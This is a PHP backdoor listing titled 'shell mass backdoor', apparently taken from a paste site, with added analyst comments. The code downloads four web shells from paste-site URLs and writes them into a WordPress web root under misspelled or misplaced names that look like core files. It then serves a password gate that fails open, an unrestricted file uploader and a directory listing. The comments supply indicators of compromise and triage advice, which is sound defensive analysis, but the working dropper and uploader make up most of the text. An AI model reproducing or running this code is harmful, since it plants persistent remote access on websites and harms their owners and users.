alien2002

shell mass backdoor

Apr 25th, 2020
text 4.29 KB | None | 0 0
  1. <?php
  // Analyst note: this listing is a PHP dropper followed by an upload/directory-listing page.
  // Listing lines 2-48 fetch four remote payloads and write them under the web root; lines 53
  // onward render a password form, a file-upload form and a listing of the current directory.
  // The annotations describe only what the visible code does.
  //
  // $server is assigned here but is not read again anywhere in the visible listing.
  2. $server = $_SERVER['HTTP_HOST'];
  // Runtime setup: error display is turned off and the execution time limit is removed, so a
  // failed download or write produces no PHP warning in the response. The '@' prefix also
  // suppresses any warning from ini_set itself.
  3. @ini_set('output_buffering', 0);
  4. @ini_set('display_errors', 0);
  5. set_time_limit(0);
  6. ini_set('memory_limit', '64M');
  7. header('Content-Type: text/html; charset=UTF-8');
  8. function http_get($url){
  // Fetches $url with cURL and returns the response body as a string; curl_exec() returns
  // false on failure and that value is passed straight back to the caller unchecked.
  // Options set: return the body instead of printing it, 10-second connect timeout,
  // follow redirects, and exclude response headers from the returned data.
  9. $im = curl_init($url);
  10. curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
  11. curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
  12. curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
  13. curl_setopt($im, CURLOPT_HEADER, 0);
  14. return curl_exec($im);
  // Unreachable: the function has already returned, so the handle is never closed explicitly.
  15. curl_close($im);
  16. }
  // Four drop stanzas with the same shape: build a path under DOCUMENT_ROOT, download a payload
  // with http_get(), and write it with fopen(..., 'w'), which creates the file or truncates an
  // existing one. The return values of http_get/fopen/fwrite are never checked and every
  // if (file_exists(...)) body is empty, so the " Stored : " line is echoed whether or not the
  // write succeeded. During triage, confirm each file on disk rather than trusting that output.
  //
  // Defender note: the four target paths below are file-system indicators for this sample.
  // The file names resemble WordPress file names with small misspellings or unusual locations
  // (for example a .php file under wp-admin/css, a directory normally expected to hold
  // stylesheets). The payload hosts on listing lines 18, 26, 34 and 42 are network indicators:
  // outbound HTTP(S) requests from the web server's PHP process to a paste site are worth
  // alerting on. File-integrity monitoring of wp-admin and wp-content/themes would surface
  // these writes.
  //
  // Drop 1 (the author's comment labels the payload "main shell").
  17. $check1 = $_SERVER['DOCUMENT_ROOT'] . "/wp-config-samsples.php" ;
  18. $text1 = http_get('https://pastebin.com/raw/WVUjGABA'); //main shell
  19. $open1 = fopen($check1, 'w');
  20. fwrite($open1, $text1);
  21. fclose($open1);
  22. if(file_exists($check1)){
  23. }
  // HTTP_HOST comes from the request's Host header and is echoed into the page without escaping.
  24. echo " Stored : <a href=\"http://".$_SERVER['HTTP_HOST']."/wp-config-samsples.php\">".$_SERVER['HTTP_HOST']."/wp-config-samsples.php</a>\n<br>";
  // Drop 2 (labelled "mini shell"); fetched over plain HTTP.
  25. $check2 = $_SERVER['DOCUMENT_ROOT'] . "/wp-content/themes/class-wp-filesystemss.php" ;
  26. $text2 = http_get('http://3e593e21dae5bb3d.paste.se/raw'); //mini shell
  27. $open2 = fopen($check2, 'w');
  28. fwrite($open2, $text2);
  29. fclose($open2);
  30. if(file_exists($check2)){
  31. }
  32. echo " Stored : <a href=\"http://".$_SERVER['HTTP_HOST']."/wp-content/themes/class-wp-filesystemss.php\">".$_SERVER['HTTP_HOST']."/wp-content/themes/class-wp-filesystemss.php </a>\n<br>";
  // Drop 3 (labelled "wso shell"); fetched over plain HTTP.
  33. $check3 = $_SERVER['DOCUMENT_ROOT'] . "/wp-admin/user/class-wp-filesystem.php" ;
  34. $text3 = http_get('http://a0bfe5a1cc734e0f.paste.se/raw'); //wso shell
  35. $open3 = fopen($check3, 'w');
  36. fwrite($open3, $text3);
  37. fclose($open3);
  38. if(file_exists($check3)){
  39. }
  40. echo " Stored : <a href=\"http://".$_SERVER['HTTP_HOST']."/wp-admin/user/class-wp-filesystem.php\">".$_SERVER['HTTP_HOST']."/wp-admin/user/class-wp-filesystem.php </a>\n<br>";
  // Drop 4 (labelled "xleet shell"); fetched over plain HTTP.
  41. $check4 = $_SERVER['DOCUMENT_ROOT'] . "/wp-admin/css/class-wp.php" ;
  42. $text4 = http_get('http://c65f10a1973cf6d8.paste.se/raw'); //xleet shell
  43. $open4 = fopen($check4, 'w');
  44. fwrite($open4, $text4);
  45. fclose($open4);
  46. if(file_exists($check4)){
  47. }
  48. echo " Stored : <a href=\"http://".$_SERVER['HTTP_HOST']."/wp-admin/css/class-wp.php\">".$_SERVER['HTTP_HOST']."/wp-admin/css/class-wp.php </a>\n<br>";
  49.  
  50. ?>
  51. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
  52. <html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1256" /></head><body>
  53. <?php
  // Password gate in front of the upload form and directory listing further down.
  // NOTE(review): session_start() does not appear anywhere in the visible listing, so unless
  // sessions are auto-started by server configuration, $_SESSION is not persisted between
  // requests and session_destroy() below has no active session to act on.
  54. if (!empty($_GET['action']) && $_GET['action'] == "logout") {session_destroy();unset ($_SESSION['pass']);}
  55.  
  // $this_script is computed here but is not read again in the visible listing.
  56. $path_name = pathinfo($_SERVER['PHP_SELF']);
  57. $this_script = $path_name['basename'];
  // Default both the stored and the submitted password to the empty string.
  58. if (empty($_SESSION['pass'])) {$_SESSION['pass']='';}
  59. if (empty($_POST['pass'])) {$_POST['pass']='';}
  // NOTE(review): $pass is never assigned in the visible listing. If it is undefined at runtime
  // it evaluates to null, and the loose comparison on listing line 62 ('' == null) is true in
  // PHP. For incident scoping, do not assume this gate restricted use of the uploader to the
  // party that planted the file.
  60. if ( $_SESSION['pass']!== $pass)
  61. {
  62. if ($_POST['pass'] == $pass) {$_SESSION['pass'] = $pass; }
  63. else
  64. {
  // PHP_SELF is request-derived and is written into the form action without escaping.
  65. echo '<form action="'.$_SERVER['PHP_SELF'].'" method="post"><input name="pass" type="password"><input type="submit"></form>';
  66. exit;
  67. }
  68. }
  69. ?>
  70.  
  71.  
  72. <form enctype="multipart/form-data" action="<?php echo $_SERVER['PHP_SELF']; ?>" method="POST">
  73. File mu mas : <input name="file" type="file" /><br />
  74. <input type="submit" value="Upload" /></form>
  75.  
  76.  
  77. <?php
  78.  
  // Upload handler: a posted file is moved into the script's current directory under the
  // client-supplied name. There is no check on extension, content type or size, and the name
  // is used as given, so any file type (including .php) can be written next to this script.
  // Defender note: once this script is found on a host, treat every file in its directory as
  // potentially attacker-written and review it; blocking PHP execution in writable directories
  // limits what such uploads can do.
  79. if (!empty($_FILES["file"]))
  80. {
  81. if ($_FILES["file"]["error"] > 0)
  82. {echo "Error: " . $_FILES["file"]["error"] . "<br>";}
  83. else
  // The file name is echoed without escaping, and "Stored file" is printed before the move is
  // attempted; the return value of move_uploaded_file() is not checked.
  84. {echo "Stored file:".$_FILES["file"]["name"]."<br/>Size:".($_FILES["file"]["size"]/1024)." kB<br/>";
  85. move_uploaded_file($_FILES["file"]["tmp_name"],$_FILES["file"]["name"]);
  86. }
  87. }
  88.  
  // Directory listing of the script's current directory: collect every entry, sort by name,
  // then print a table of name, filetype() and filesize() for entries not starting with ".".
  // The printed count includes the dot entries that the table then skips.
  89. // open this directory
  90. $myDirectory = opendir(".");
  91. // get each entry
  92. while($entryName = readdir($myDirectory)) {$dirArray[] = $entryName;} closedir($myDirectory);
  93. $indexCount = count($dirArray);
  94. echo "$indexCount files<br/>";
  95. sort($dirArray);
  96.  
  97. echo "<TABLE border=1 cellpadding=5 cellspacing=0 class=whitelinks><TR><TH>Filename</TH><th>Filetype</th><th>Filesize</th></TR>\n";
  98.  
  99. for($index=0; $index < $indexCount; $index++)
  100. {
  // Skip names beginning with "." (this also hides "." and ".."). Entry names are written into
  // the href and link text without escaping.
  101. if (substr("$dirArray[$index]", 0, 1) != ".")
  102. {
  103. echo "<TR>
  104. <td><a href=\"$dirArray[$index]\">$dirArray[$index]</a></td>
  105. <td>".filetype($dirArray[$index])."</td>
  106. <td>".filesize($dirArray[$index])."</td>
  107. </TR>";
  108. }
  109. }
  110. echo "</TABLE>";
  111. ?>